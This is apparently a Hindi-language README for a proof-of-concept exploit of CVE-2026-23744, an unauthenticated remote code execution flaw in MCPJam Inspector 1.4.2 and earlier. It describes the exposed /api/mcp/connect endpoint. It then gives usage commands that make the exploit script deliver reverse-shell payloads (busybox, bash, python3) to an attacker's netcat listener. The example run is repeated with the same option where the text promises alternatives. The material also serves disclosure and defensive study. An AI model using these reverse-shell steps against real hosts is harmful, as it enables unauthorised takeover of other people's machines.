
CVE-2026-23744 — MCPJam Inspector <= 1.4.2 में अनधिकृत Remote Code Execution भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट।
MCPJam Inspector <= 1.4.2 डिफ़ॉल्ट रूप से 0.0.0.0 पर बाइंड होता है और बिना किसी प्रमाणीकरण के /api/mcp/connect को एक्सपोज़ करता है। यह एंडपॉइंट एक serverConfig ऑब्जेक्ट स्वीकार करता है जो सीधे होस्ट पर एक प्रोसेस स्पॉन करता है — रिवर्स शेल पेलोड पास करने पर बिना किसी क्रेडेंशियल के तत्काल RCE मिल जाता है।
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| फ़्लैग | विवरण | डिफ़ॉल्ट |
|---|---|---|
-u | लक्ष्य URL | आवश्यक |
-i | आपका लिसनर IP (LHOST) | आवश्यक |
-p | आपका लिसनर पोर्ट (LPORT) | आवश्यक |
-m | पेलोड विधि: busybox, bash, python3 | busybox |
चरण 1 — अपना लिसनर शुरू करें:
nc -lvnp 4444
चरण 2 — एक्सप्लॉइट चलाएँ:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
यदि लक्ष्य पर busybox काम नहीं करता है, तो अन्य विधियाँ आज़माएँ:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| सॉफ़्टवेयर | असुरक्षित | ठीक किया गया |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |